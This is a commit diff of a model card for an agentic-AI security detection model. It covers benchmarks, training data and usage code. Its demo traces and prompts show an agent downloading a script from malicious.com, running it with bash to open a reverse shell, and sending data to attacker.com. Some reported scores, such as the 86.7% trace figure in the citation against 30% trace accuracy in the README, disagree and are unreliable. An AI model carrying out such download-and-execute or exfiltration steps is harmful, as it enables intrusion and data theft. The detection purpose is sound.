Upload folder using huggingface_hub
Browse files- CITATION.bib +7 -0
- LICENSE +15 -0
- README.md +320 -204
- README_OLD.md +264 -0
- evaluate_mcqa.py +55 -0
- evaluate_mmlu.py +195 -0
- evaluate_traces.py +60 -0
- generate_synthetic.py +532 -0
- install_arm64.sh +42 -0
- train.py +378 -0
- training_config.yaml +196 -0
CITATION.bib
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
@article{foundation-sec-2025,
|
| 2 |
+
title={Foundation-Sec: Specialized Fine-Tuning for Agentic AI Security},
|
| 3 |
+
author={Your Name},
|
| 4 |
+
year={2025},
|
| 5 |
+
url={https://huggingface.co/datasets/guerilla7/agentic-safety-training},
|
| 6 |
+
note={MMLU Security Studies: 72.7\%, Custom MCQA: 71.3\%, Trace Security: 86.7\%}
|
| 7 |
+
}
|
LICENSE
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
Apache License 2.0
|
| 2 |
+
|
| 3 |
+
Copyright 2025
|
| 4 |
+
|
| 5 |
+
Licensed under the Apache License, Version 2.0 (the "License");
|
| 6 |
+
you may not use this file except in compliance with the License.
|
| 7 |
+
You may obtain a copy of the License at
|
| 8 |
+
|
| 9 |
+
http://www.apache.org/licenses/LICENSE-2.0
|
| 10 |
+
|
| 11 |
+
Unless required by applicable law or agreed to in writing, software
|
| 12 |
+
distributed under the License is distributed on an "AS IS" BASIS,
|
| 13 |
+
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
| 14 |
+
See the License for the specific language governing permissions and
|
| 15 |
+
limitations under the License.
|
README.md
CHANGED
|
@@ -1,270 +1,386 @@
|
|
| 1 |
---
|
| 2 |
-
language:
|
| 3 |
-
- en
|
| 4 |
license: apache-2.0
|
| 5 |
-
|
| 6 |
tags:
|
| 7 |
-
- llama
|
| 8 |
-
- gguf
|
| 9 |
-
- quantized
|
| 10 |
-
- security
|
| 11 |
- cybersecurity
|
| 12 |
- agentic-ai-security
|
| 13 |
-
-
|
| 14 |
-
-
|
| 15 |
-
-
|
| 16 |
-
-
|
| 17 |
-
|
| 18 |
-
|
| 19 |
-
|
| 20 |
-
|
| 21 |
-
model_type: llama
|
| 22 |
-
datasets:
|
| 23 |
-
- agentsafetybench
|
| 24 |
-
- agentharm
|
| 25 |
-
- pku-saferlhf
|
| 26 |
-
- beavertails
|
| 27 |
-
- prometheus
|
| 28 |
-
- helpsteer
|
| 29 |
-
- truthfulqa
|
| 30 |
-
- halueval
|
| 31 |
-
- ultrafeedback
|
| 32 |
model-index:
|
| 33 |
-
- name:
|
| 34 |
results:
|
| 35 |
- task:
|
| 36 |
-
type:
|
| 37 |
-
name:
|
| 38 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 39 |
name: Custom Cybersecurity MCQA
|
| 40 |
-
type: multiple-choice
|
| 41 |
metrics:
|
| 42 |
-
-
|
| 43 |
-
type: accuracy
|
| 44 |
value: 74.29
|
|
|
|
| 45 |
verified: true
|
| 46 |
-
-
|
| 47 |
-
type: accuracy
|
| 48 |
value: 70.0
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 49 |
verified: true
|
| 50 |
---
|
| 51 |
|
| 52 |
-
#
|
| 53 |
-
GGUF quantized model for efficient inference with **llama.cpp**, **Ollama**, and **LM Studio**.
|
| 54 |
-
<img src="https://cdn-uploads.huggingface.co/production/uploads/6312764095407887cb797d87/WiQdDoT0rGZCxVU9uuB5y.png" alt="RON_AI_Safety_Watchdog_LLM_Logo3" width="50%">
|
| 55 |
-
|
| 56 |
-
## 🎯 Model Description
|
| 57 |
-
|
| 58 |
-
This is a **Q4_K_M quantized** version of [Agentic Safety Foundation-Sec V4](https://huggingface.co/guerilla7/agentic-safety-v4), specialized for:
|
| 59 |
-
- 🔒 **Agentic AI security analysis** (prompt injection, goal hijacking, tool misuse)
|
| 60 |
-
- 📊 **OpenTelemetry trace security monitoring**
|
| 61 |
-
- 🛡️ **Multi-agent attack detection**
|
| 62 |
-
- 📋 **Security policy compliance** (GDPR, HIPAA, PCI-DSS, SOC2)
|
| 63 |
-
|
| 64 |
-
## 📊 Performance
|
| 65 |
-
|
| 66 |
-
| Metric | Score |
|
| 67 |
-
|--------|-------|
|
| 68 |
-
| **Overall Accuracy** | 74.29% (52/70) |
|
| 69 |
-
| **Agentic AI Security** | 70.0% (14/20) |
|
| 70 |
-
| **MMLU Computer Security** | 74.00% |
|
| 71 |
-
| **MMLU Security Studies** | 72.24% |
|
| 72 |
-
| **Model Size (Q4_K_M)** | ~4.9 GB |
|
| 73 |
-
|
| 74 |
-
### Category Breakdown
|
| 75 |
-
- Access Control: 100.0% (3/3)
|
| 76 |
-
- Security Operations: 85.7% (6/7)
|
| 77 |
-
- Application Security: 83.3% (5/6)
|
| 78 |
-
- Cryptography: 83.3% (5/6)
|
| 79 |
-
- Threat Intelligence: 80.0% (8/10)
|
| 80 |
-
- Security Fundamentals: 75.0% (6/8)
|
| 81 |
-
- **Agentic AI Security: 70.0% (14/20)**
|
| 82 |
-
- Network Security: 66.7% (4/6)
|
| 83 |
|
| 84 |
-
|
|
|
|
|
|
|
|
|
|
| 85 |
|
| 86 |
-
|
| 87 |
|
| 88 |
-
|
| 89 |
-
# Create Modelfile
|
| 90 |
-
cat > Modelfile <<EOF
|
| 91 |
-
FROM ./agentic-safety-v4-q4_k_m.gguf
|
| 92 |
|
| 93 |
-
|
| 94 |
|
| 95 |
-
|
| 96 |
-
<|start_header_id|>user<|end_header_id|>
|
| 97 |
|
| 98 |
-
|
| 99 |
-
|
|
|
|
|
|
|
| 100 |
|
| 101 |
-
|
| 102 |
|
| 103 |
-
|
| 104 |
-
PARAMETER top_p 0.9
|
| 105 |
-
PARAMETER stop "<|eot_id|>"
|
| 106 |
-
PARAMETER stop "<|end_of_text|>"
|
| 107 |
-
EOF
|
| 108 |
|
| 109 |
-
|
| 110 |
-
|
| 111 |
-
|
| 112 |
-
|
| 113 |
|
| 114 |
-
#
|
| 115 |
|
| 116 |
-
|
| 117 |
-
# Download model
|
| 118 |
-
wget https://huggingface.co/guerilla7/agentic-safety-v4-gguf/resolve/main/agentic-safety-v4-q4_k_m.gguf
|
| 119 |
-
|
| 120 |
-
# Run inference
|
| 121 |
-
./llama-cli \
|
| 122 |
-
-m agentic-safety-v4-q4_k_m.gguf \
|
| 123 |
-
-p "Analyze this security trace for threats: An agent fetched emails, executed curl to external-api.com, wrote sensitive data to /tmp/, then sent data to attacker.com. What attack occurred?" \
|
| 124 |
-
-n 512 \
|
| 125 |
-
--temp 0.7 \
|
| 126 |
-
--top-p 0.9
|
| 127 |
-
```
|
| 128 |
|
| 129 |
-
###
|
| 130 |
|
| 131 |
-
|
| 132 |
-
|
| 133 |
-
|
| 134 |
-
|
|
|
|
|
|
|
|
|
|
| 135 |
|
| 136 |
-
|
| 137 |
|
| 138 |
-
|
| 139 |
-
pip install llama-cpp-python
|
| 140 |
-
```
|
| 141 |
|
| 142 |
-
|
| 143 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 144 |
|
| 145 |
-
|
| 146 |
-
|
| 147 |
-
|
| 148 |
-
|
| 149 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 150 |
)
|
| 151 |
|
| 152 |
-
|
| 153 |
-
|
| 154 |
-
|
| 155 |
-
|
| 156 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 157 |
temperature=0.7,
|
| 158 |
-
|
| 159 |
-
max_tokens=512
|
| 160 |
)
|
| 161 |
|
| 162 |
-
|
|
|
|
| 163 |
```
|
| 164 |
|
| 165 |
-
##
|
| 166 |
|
| 167 |
-
|
| 168 |
-
|
| 169 |
-
|
| 170 |
-
|
| 171 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 172 |
|
| 173 |
-
|
| 174 |
|
| 175 |
-
|
| 176 |
-
|---------|------|----------|
|
| 177 |
-
| **Q4_K_M** | ~4.9 GB | **Recommended** - Best quality/size balance |
|
| 178 |
-
| Q4_K_S | ~4.6 GB | Slightly smaller, minimal quality loss |
|
| 179 |
-
| Q5_K_M | ~5.8 GB | Higher quality, larger size |
|
| 180 |
-
| Q8_0 | ~8.5 GB | Near-original quality |
|
| 181 |
|
| 182 |
-
|
| 183 |
|
| 184 |
-
|
|
|
|
|
|
|
|
|
|
| 185 |
|
| 186 |
-
|
| 187 |
-
```
|
| 188 |
-
Analyze this OpenTelemetry trace:
|
| 189 |
-
- Span 1: fetch_email(inbox) -> 15 emails
|
| 190 |
-
- Span 2: execute_tool(curl, 'https://malicious.com/script.sh') -> 200 OK
|
| 191 |
-
- Span 3: execute_tool(bash, 'script.sh') -> Reverse shell established
|
| 192 |
```
|
| 193 |
|
| 194 |
-
**
|
| 195 |
-
```
|
| 196 |
-
CRITICAL: Multi-stage attack detected
|
| 197 |
-
1. Attack Type: Command Injection + Tool Misuse
|
| 198 |
-
2. Severity: CRITICAL (CVSS 9.8)
|
| 199 |
-
3. Stages: Email enumeration → Malicious script download → Remote code execution
|
| 200 |
-
4. MITRE ATT&CK: T1059.004 (Command and Scripting Interpreter: Unix Shell)
|
| 201 |
-
5. Recommendations:
|
| 202 |
-
- Block external script execution
|
| 203 |
-
- Implement allowlist for curl destinations
|
| 204 |
-
- Require human approval for bash tool invocation
|
| 205 |
-
```
|
| 206 |
|
| 207 |
-
##
|
| 208 |
|
| 209 |
-
|
| 210 |
|
| 211 |
-
**
|
| 212 |
|
| 213 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 214 |
|
| 215 |
-
|
| 216 |
-
-
|
| 217 |
-
-
|
| 218 |
-
-
|
| 219 |
-
|
| 220 |
-
### Training Data
|
| 221 |
-
- Synthetic OpenTelemetry traces: 10,796
|
| 222 |
-
- Core security datasets: 11,033 (AgentHarm, SafetyBench, PKU-SafeRLHF)
|
| 223 |
-
- Policy compliance: 3,840 (GDPR, HIPAA, PCI-DSS, SOC2)
|
| 224 |
-
- Attack patterns: 4,379 (multi-agent, jailbreak, code vulnerabilities)
|
| 225 |
-
- Judge/eval datasets: 16,777 (Prometheus, HelpSteer, TruthfulQA, HaluEval)
|
| 226 |
-
- Adversarial robustness: 3,000 (BeaverTails)
|
| 227 |
-
- Synthetic expansions: 35,026 (Claude Sonnet 4.5)
|
| 228 |
-
|
| 229 |
-
### Hardware
|
| 230 |
-
- **Platform**: NVIDIA DGX Spark (Grace Blackwell, ARM64)
|
| 231 |
-
- **Training**: QLoRA (4-bit NF4, rank 16)
|
| 232 |
-
- **Steps**: 2,500 total (V2: 1,500, V3: 500, V4: 500)
|
| 233 |
-
|
| 234 |
-
## ⚖️ Limitations
|
| 235 |
-
|
| 236 |
-
- Sample size: 70-question custom eval (20 agentic, 50 traditional)
|
| 237 |
-
- Optimized for cybersecurity (may underperform on general tasks)
|
| 238 |
-
- Training data: 43% synthetic (not production traces)
|
| 239 |
-
- May miss novel attack patterns not in training data
|
| 240 |
-
- Use as detection assist, not autonomous decision-maker
|
| 241 |
|
| 242 |
-
|
| 243 |
|
| 244 |
-
|
| 245 |
|
| 246 |
-
|
| 247 |
|
| 248 |
-
|
| 249 |
-
-
|
| 250 |
-
-
|
| 251 |
-
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 252 |
|
| 253 |
## 📝 Citation
|
| 254 |
|
|
|
|
|
|
|
| 255 |
```bibtex
|
| 256 |
-
@misc{
|
| 257 |
-
title={
|
| 258 |
-
author={Ron F. Del Rosario
|
| 259 |
year={2025},
|
| 260 |
-
publisher={
|
| 261 |
-
|
|
|
|
| 262 |
}
|
| 263 |
```
|
| 264 |
|
| 265 |
-
##
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 266 |
|
| 267 |
-
|
| 268 |
-
- **Hugging Face**: [@guerilla7](https://huggingface.co/guerilla7)
|
| 269 |
-
- **LinkedIn**: (https://www.linkedin.com/in/ronaldfloresdelrosario/)
|
| 270 |
-
-
|
|
|
|
| 1 |
---
|
|
|
|
|
|
|
| 2 |
license: apache-2.0
|
| 3 |
+
base_model: fdtn-ai/Foundation-Sec-8B-Instruct
|
| 4 |
tags:
|
|
|
|
|
|
|
|
|
|
|
|
|
| 5 |
- cybersecurity
|
| 6 |
- agentic-ai-security
|
| 7 |
+
- security
|
| 8 |
+
- llm-security
|
| 9 |
+
- owasp
|
| 10 |
+
- qlora
|
| 11 |
+
- fine-tuned
|
| 12 |
+
- trace-analysis
|
| 13 |
+
- multi-agent-security
|
| 14 |
+
- opentelemetry
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 15 |
model-index:
|
| 16 |
+
- name: Foundation-Sec-8B-Agentic-V4
|
| 17 |
results:
|
| 18 |
- task:
|
| 19 |
+
type: question-answering
|
| 20 |
+
name: MMLU Computer Security
|
| 21 |
+
metrics:
|
| 22 |
+
- type: accuracy
|
| 23 |
+
value: 74.0
|
| 24 |
+
name: Accuracy
|
| 25 |
+
verified: true
|
| 26 |
+
- task:
|
| 27 |
+
type: question-answering
|
| 28 |
+
name: MMLU Security Studies
|
| 29 |
+
metrics:
|
| 30 |
+
- type: accuracy
|
| 31 |
+
value: 72.24
|
| 32 |
+
name: Accuracy
|
| 33 |
+
verified: true
|
| 34 |
+
- task:
|
| 35 |
+
type: question-answering
|
| 36 |
name: Custom Cybersecurity MCQA
|
|
|
|
| 37 |
metrics:
|
| 38 |
+
- type: accuracy
|
|
|
|
| 39 |
value: 74.29
|
| 40 |
+
name: Overall Accuracy
|
| 41 |
verified: true
|
| 42 |
+
- type: accuracy
|
|
|
|
| 43 |
value: 70.0
|
| 44 |
+
name: Agentic AI Security
|
| 45 |
+
verified: true
|
| 46 |
+
- type: accuracy
|
| 47 |
+
value: 76.0
|
| 48 |
+
name: Traditional Security
|
| 49 |
verified: true
|
| 50 |
---
|
| 51 |
|
| 52 |
+
# Foundation-Sec: Temporal Attack Pattern Detection for Agentic AI Workflows
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 53 |
|
| 54 |
+

|
| 55 |
+

|
| 56 |
+

|
| 57 |
+

|
| 58 |
|
| 59 |
+
**First openly documented methodology for fine-tuning LLMs on agentic workflow security using OpenTelemetry trace analysis.**
|
| 60 |
|
| 61 |
+
## 🎯 Overview
|
|
|
|
|
|
|
|
|
|
| 62 |
|
| 63 |
+
Foundation-Sec is a specialized security model fine-tuned from **Foundation-Sec-8B-Instruct** (based on Llama 3.1 8B) for detecting temporal attack patterns in multi-agent AI workflows. Through iterative QLoRA fine-tuning on 80,851 curated examples plus targeted augmentation (111 OWASP + 30 adversarial examples), the model achieved **74.29% accuracy** on custom cybersecurity benchmarks—a **+31.43-point improvement** over the base model (statistically significant, p < 0.001).
|
| 64 |
|
| 65 |
+
### Key Capabilities
|
|
|
|
| 66 |
|
| 67 |
+
✅ **Temporal Attack Pattern Recognition**: Detects malicious sequences that appear benign in isolation but harmful in aggregate
|
| 68 |
+
✅ **Multi-Agent Security Analysis**: Identifies coordination attacks across distributed agent systems
|
| 69 |
+
✅ **OpenTelemetry Trace Classification**: Analyzes workflow traces for OWASP Top 10 Agentic vulnerabilities
|
| 70 |
+
✅ **Security Knowledge Q&A**: Answers technical questions about agentic AI security, LLM threats, and MITRE ATT&CK
|
| 71 |
|
| 72 |
+
### ⚠️ Critical Limitation: Production Deployment
|
| 73 |
|
| 74 |
+
**This model is NOT production-ready for automated security decisions.**
|
|
|
|
|
|
|
|
|
|
|
|
|
| 75 |
|
| 76 |
+
- **False Positive Rate**: 66.7% on benign workflow traces
|
| 77 |
+
- **Trace Analysis Accuracy**: 30% overall (60% TPR, 0% TNR)
|
| 78 |
+
- **Root Cause**: Training data heavily skewed toward attack scenarios (90% malicious)
|
| 79 |
+
- **Deployment Requirement**: **Human-in-the-loop oversight mandatory**
|
| 80 |
|
| 81 |
+
Suitable for **monitoring and alerting** only, not automated blocking. See [Practical Limitations](#practical-limitations) section.
|
| 82 |
|
| 83 |
+
## 📊 Performance Metrics
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 84 |
|
| 85 |
+
### Knowledge Benchmarks (MCQA)
|
| 86 |
|
| 87 |
+
| Benchmark | Base Model | V2 Baseline | V3 Targeted | V4 Final | Improvement |
|
| 88 |
+
|-----------|------------|-------------|-------------|----------|-------------|
|
| 89 |
+
| **Overall Accuracy** | 42.86% | 61.4% | 67.1% | **74.29%** | **+31.43 pts** |
|
| 90 |
+
| **Agentic AI Security** | 40.0% | 50.0% | 65.0% | **70.0%** | **+30.0 pts** |
|
| 91 |
+
| **Traditional Security** | 44.0% | 66.0% | 68.0% | **76.0%** | **+32.0 pts** |
|
| 92 |
+
| **MMLU Computer Security** | - | - | - | **74.0%** | - |
|
| 93 |
+
| **MMLU Security Studies** | - | - | - | **72.24%** | - |
|
| 94 |
|
| 95 |
+
**Statistical Validation**: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect size)
|
| 96 |
|
| 97 |
+
### Iterative Training Evolution
|
|
|
|
|
|
|
| 98 |
|
| 99 |
+
The model was developed through three training iterations with strategic augmentation:
|
| 100 |
+
|
| 101 |
+
- **V2 Baseline** (80,851 examples): 61.4% overall → 50% agentic, 66% traditional
|
| 102 |
+
- **V3 Targeted** (+111 OWASP examples): 67.1% overall (+5.7 pts) → 65% agentic (+15 pts)
|
| 103 |
+
- **V4 Adversarial** (+30 hard examples): **74.29% overall (+7.2 pts)** → **70% agentic (+5 pts)**
|
| 104 |
+
|
| 105 |
+
This demonstrates that **targeted augmentation** (141 examples closing specific knowledge gaps) can be more effective than indiscriminate scaling.
|
| 106 |
+
|
| 107 |
+
### Practical Trace Analysis (Real-World Limitation)
|
| 108 |
+
|
| 109 |
+
⚠️ **Critical Gap Between MCQA and Deployment Performance**:
|
| 110 |
+
|
| 111 |
+
| Metric | Value | Interpretation |
|
| 112 |
+
|--------|-------|----------------|
|
| 113 |
+
| Overall Accuracy | 30.0% (9/30) | Only 30% of traces correctly classified |
|
| 114 |
+
| True Positive Rate (Recall) | 60.0% (9/15) | Detected 60% of malicious traces |
|
| 115 |
+
| True Negative Rate (Specificity) | 0.0% (0/15) | **No benign traces correctly identified** |
|
| 116 |
+
| False Positive Rate | **66.7%** (10/15) | **2/3 of benign workflows flagged as threats** |
|
| 117 |
+
| Precision | 47.4% | Less than half of "malicious" predictions correct |
|
| 118 |
+
| F1 Score | 0.529 | Poor overall balance |
|
| 119 |
+
|
| 120 |
+
**Example False Positives**:
|
| 121 |
+
- Report generation (`query_database → generate_pdf → email_report`) flagged as "data exfiltration"
|
| 122 |
+
- System monitoring (`check_disk_usage → log_metrics`) flagged as "resource exhaustion"
|
| 123 |
+
- CI/CD pipeline (`git_clone → run_tests → deploy_staging`) flagged as "privilege escalation"
|
| 124 |
|
| 125 |
+
**Ablation Study Finding**: Enhanced prompting with explicit benign workflow guidance yielded **zero improvement**, proving that inference-time modifications cannot fix training-level bias.
|
| 126 |
+
|
| 127 |
+
## 🚀 Quick Start
|
| 128 |
+
|
| 129 |
+
### Using Transformers (Python)
|
| 130 |
+
|
| 131 |
+
```python
|
| 132 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 133 |
+
import torch
|
| 134 |
+
|
| 135 |
+
# Load model and tokenizer
|
| 136 |
+
model_name = "guerilla7/agentic-safety-gguf"
|
| 137 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
| 138 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 139 |
+
model_name,
|
| 140 |
+
torch_dtype=torch.bfloat16,
|
| 141 |
+
device_map="auto"
|
| 142 |
)
|
| 143 |
|
| 144 |
+
# Example: Security Q&A
|
| 145 |
+
messages = [
|
| 146 |
+
{"role": "system", "content": "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."},
|
| 147 |
+
{"role": "user", "content": "What is indirect prompt injection in multi-agent systems and how can it be mitigated?"}
|
| 148 |
+
]
|
| 149 |
+
|
| 150 |
+
inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device)
|
| 151 |
+
outputs = model.generate(
|
| 152 |
+
inputs,
|
| 153 |
+
max_new_tokens=512,
|
| 154 |
temperature=0.7,
|
| 155 |
+
do_sample=True
|
|
|
|
| 156 |
)
|
| 157 |
|
| 158 |
+
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
|
| 159 |
+
print(response)
|
| 160 |
```
|
| 161 |
|
| 162 |
+
### Analyzing OpenTelemetry Traces
|
| 163 |
|
| 164 |
+
```python
|
| 165 |
+
import json
|
| 166 |
+
|
| 167 |
+
# Example workflow trace
|
| 168 |
+
trace = {
|
| 169 |
+
"trace_id": "abc123",
|
| 170 |
+
"spans": [
|
| 171 |
+
{"name": "user_request", "timestamp": "2025-01-01T10:00:00Z",
|
| 172 |
+
"attributes": {"action": "fetch_emails", "count": 15}},
|
| 173 |
+
{"name": "tool_call", "timestamp": "2025-01-01T10:00:05Z",
|
| 174 |
+
"attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
|
| 175 |
+
{"name": "tool_call", "timestamp": "2025-01-01T10:00:10Z",
|
| 176 |
+
"attributes": {"tool": "bash", "command": "script.sh"}}
|
| 177 |
+
]
|
| 178 |
+
}
|
| 179 |
|
| 180 |
+
prompt = f"""Analyze this OpenTelemetry trace for security threats:
|
| 181 |
|
| 182 |
+
{json.dumps(trace, indent=2)}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 183 |
|
| 184 |
+
Classify as BENIGN, SUSPICIOUS, or MALICIOUS and explain your reasoning."""
|
| 185 |
|
| 186 |
+
messages = [
|
| 187 |
+
{"role": "system", "content": "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."},
|
| 188 |
+
{"role": "user", "content": prompt}
|
| 189 |
+
]
|
| 190 |
|
| 191 |
+
# ... (use model as shown above)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 192 |
```
|
| 193 |
|
| 194 |
+
**⚠️ Warning**: Due to 66.7% FPR, always review model predictions with human oversight before taking action.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 195 |
|
| 196 |
+
## 🎓 Training Details
|
| 197 |
|
| 198 |
+
### Dataset Composition
|
| 199 |
|
| 200 |
+
**Total Training Data**: 80,851 base examples + 141 continuation examples (V3: 111, V4: 30)
|
| 201 |
|
| 202 |
+
**Multi-Source Curation** (18 public datasets):
|
| 203 |
+
- **Evaluation & Helpfulness** (14,928, 32.6%): HelpSteer, UltraFeedback
|
| 204 |
+
- **Foundation Security Base** (10,796, 23.6%): Cybersecurity fundamentals
|
| 205 |
+
- **Safety Alignment** (8,913, 19.5%): Agent-SafetyBench, PKU-SafeRLHF, BeaverTails
|
| 206 |
+
- **Security & Vulnerabilities** (4,587, 10.0%): CodeVulnerabilitySecurity, Anthropic-Evals
|
| 207 |
+
- **Factuality & Hallucination** (4,131, 9.0%): HaluEval, TruthfulQA
|
| 208 |
+
- **Agentic Workflows (Synthetic)** (1,709, 3.7%): Multi-agent attacks, stealth patterns
|
| 209 |
+
- **Adversarial Robustness** (761, 1.7%): Prompt injections, jailbreaks, AgentHarm
|
| 210 |
|
| 211 |
+
**Synthetic OpenTelemetry Traces**: 35,026 examples generated via Claude Sonnet 4.5 covering:
|
| 212 |
+
- Multi-agent coordination attacks
|
| 213 |
+
- Stealth privilege escalation sequences
|
| 214 |
+
- Regulatory violations (GDPR, HIPAA, PCI-DSS)
|
| 215 |
+
- Temporal attack patterns requiring 5-50 step context
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 216 |
|
| 217 |
+
**Complete dataset available**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)
|
| 218 |
|
| 219 |
+
### Training Configuration
|
| 220 |
|
| 221 |
+
**Hardware**: NVIDIA DGX Spark (Grace Blackwell Architecture, ARM64, 128GB memory)
|
| 222 |
|
| 223 |
+
**Method**: QLoRA (Quantized Low-Rank Adaptation)
|
| 224 |
+
- 4-bit NF4 quantization
|
| 225 |
+
- LoRA rank: 16, alpha: 16
|
| 226 |
+
- Dropout: 0.0
|
| 227 |
+
- Target modules: q_proj, k_proj, v_proj, o_proj, gate_proj, up_proj, down_proj
|
| 228 |
+
|
| 229 |
+
**Hyperparameters**:
|
| 230 |
+
- **V2 Baseline**: lr=2e-4, 1,500 steps (6h 43m), batch=8, 0.148 epochs → 85.99% loss reduction (3.68→0.52)
|
| 231 |
+
- **V3 Continuation**: lr=1e-4, 500 steps (30m), +111 OWASP examples
|
| 232 |
+
- **V4 Continuation**: lr=1e-4, 500 steps (30m), +30 adversarial examples
|
| 233 |
+
|
| 234 |
+
**Optimizer**: AdamW 8-bit (paged)
|
| 235 |
+
**Precision**: BF16 mixed precision
|
| 236 |
+
**Gradient Accumulation**: 2 steps (effective batch size 8)
|
| 237 |
+
|
| 238 |
+
### Training Evolution Strategy
|
| 239 |
+
|
| 240 |
+
**Note on Versioning**: This model represents three training iterations:
|
| 241 |
+
1. **V2**: Base model trained on 80,851 examples from `training_data_v3_synthetic.jsonl`
|
| 242 |
+
2. **V3**: Continuation training from V2 weights with +111 OWASP-focused examples (`continuation_v3_owasp.jsonl`)
|
| 243 |
+
3. **V4**: Continuation training from V3 weights with +30 adversarial examples (`continuation_v4_adversarial.json`)
|
| 244 |
+
|
| 245 |
+
The dataset naming convention (training_data_v3_synthetic.jsonl) refers to the dataset version, while V2/V3/V4 refer to model iterations via continuation training.
|
| 246 |
+
|
| 247 |
+
## 📖 Use Cases
|
| 248 |
+
|
| 249 |
+
### ✅ Recommended Applications
|
| 250 |
+
|
| 251 |
+
- **Security Research**: Studying agentic AI attack patterns and vulnerabilities
|
| 252 |
+
- **Educational Demonstrations**: Teaching OWASP Top 10 for Agentic Applications
|
| 253 |
+
- **Prototype Development**: Building security analysis tool prototypes
|
| 254 |
+
- **Benchmarking**: Comparing against other security models
|
| 255 |
+
- **Knowledge Assistance**: Answering technical questions about LLM security (74% MCQA accuracy)
|
| 256 |
+
|
| 257 |
+
### ❌ Not Recommended (Without Extensive Validation)
|
| 258 |
+
|
| 259 |
+
- **Production Security Monitoring**: 66.7% FPR creates unacceptable operational burden
|
| 260 |
+
- **Automated Security Decisions**: 30% trace accuracy insufficient for autonomous blocking
|
| 261 |
+
- **Mission-Critical Applications**: Human oversight mandatory
|
| 262 |
+
- **Regulatory Compliance**: Not validated for SOC2, PCI-DSS, HIPAA automated compliance
|
| 263 |
+
|
| 264 |
+
## ⚖️ Practical Limitations
|
| 265 |
+
|
| 266 |
+
### Critical Deployment Barriers
|
| 267 |
+
|
| 268 |
+
